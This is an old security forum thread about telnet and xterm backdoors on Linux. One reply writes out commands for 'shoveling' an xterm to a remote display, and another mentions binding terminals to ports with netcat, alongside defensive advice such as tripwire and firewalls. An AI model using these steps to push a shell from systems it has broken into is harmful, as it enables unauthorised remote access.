|
-
December 1st, 2003, 08:40 PM
#1
telnet/xterm backdoors??
Does anyone know if it is possible to make backdoors with telnet or xterm on a linux system. I somewhere read that you could make telnet spit out a /bin/sh to a remote host.
Also I checked the man pages for both and found next to nothing
thanks
The command completed successfully.
\"They drew first blood not me.\"
-
December 1st, 2003, 08:56 PM
#2
It's not a feature of telnet or xterm. Attackers replace the existing copies of the telnet/xterm/ssh/etc. programs with ones that more-or-less appear to work the same, but actually do something evil, in addition.
Programs like tripwire will help detect these changes.
-
December 1st, 2003, 09:10 PM
#3
Think you may be referring to shoveling an XTERM back. The person would have to obtain some kind of access to your system first, but if you do not have a firewall/router blocking outgoing connections, they could send an exterminal back to their own pc, in essentially one command.
To test for yourself, goto system1:
DISPLAY=<system2>:0.0; export DISPLAY
system2:
xhost +system1
system1:
xterm & (or whatever the binary is on your system).
You should notice that the xterm from system1 now appeaers on system2 as would any gui window executed from the same shell where you set your DISPLAY environment variable. Can be nice, but can be painful too...
Also note, you could do the same thing if the system had rexec or rcmd running (you do have to change up the command line to tell the system where to pipe the xterm, but it works nonetheless).
I would assume this is roughly what you are asking?
/nebulus
There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.
(Merovingian - Matrix Reloaded)
-
December 1st, 2003, 10:17 PM
#4
nebulus200 thanks for the help.
Do you know any informative links where I could learn more?
The command completed successfully.
\"They drew first blood not me.\"
-
December 2nd, 2003, 10:59 PM
#5
There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.
(Merovingian - Matrix Reloaded)
-
December 2nd, 2003, 11:01 PM
#6
One place you can try is the Hacking Exposed 4 book by Foundstone. They discuss this in detail along with ways to prevent it. I know this isn't a link but I do know that the info you most likely want is in the book.
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
-
December 2nd, 2003, 11:12 PM
#7
Thehorse13 is right, as usual. I read about that in Hacking Exposed. I have the third edition though.
Maximum Linux Security also talks about it.
It is also possible to use netcat to make telnet or xterm to listen on any port of the attackers choice...
Most won't do this (hopefully)... as it will be open to anyone who tries to connect.
Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.
-
December 3rd, 2003, 01:36 AM
#8
Originally posted here by phishphreek80
It is also possible to use netcat to make telnet or xterm to listen on any port of the attackers choice...
Most won't do this (hopefully)... as it will be open to anyone who tries to connect. [/B]
Yes, thats what I was exactly going to suggest to him! 
Netcat is a tool of wonders. You may want to do some research on Cryptcat and/or Socat.
...This Space For Rent.
-[WebCarnage] 
-
December 3rd, 2003, 03:04 AM
#9
Junior Member
I don't know any thing on telneting.could someone please tell me what it is and how to do it?[it would be appretiated]{thanks}
-
December 3rd, 2003, 03:21 AM
#10
kyleiscool: You should do some searching of the forum, as this has been discussed time and time again. Below is a link to get you stared. The search feature is at the top right of the main page.
You can also find a lot of good info about telnet by using www.google.com
The main thing you need to know is DON'T USE IT ACROSS THE INTERNET!
It is by NO means secure... everything can be captured.
If you are just exploring and learning how protocols work.. then fine, it is good for that.
BUT, thats about it.
You can use it on your trusted LAN... but there are far better alternatives... such as ssh (secure shell).
http://www.antionline.com/showthread...hreadid=251708
PS: I hope that isn't your real address that you put in your "location field" of your profile. Everyone can see that. It isn't wise to put your personal info up for the world to see... you make yourself an easy target for identity theft. or.. psycho serial killers... muhahaha muhahaha
wow... you're only 13-14yrs old? maybe its time your parents had a talk with you about what info NOT to give out while online. Its a very dangerous world... there are some very scary people out there. you should NEVER give out your info to ANYONE. Just like in the real world... you wouldn't tell a stranger where you live, would you?
Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote
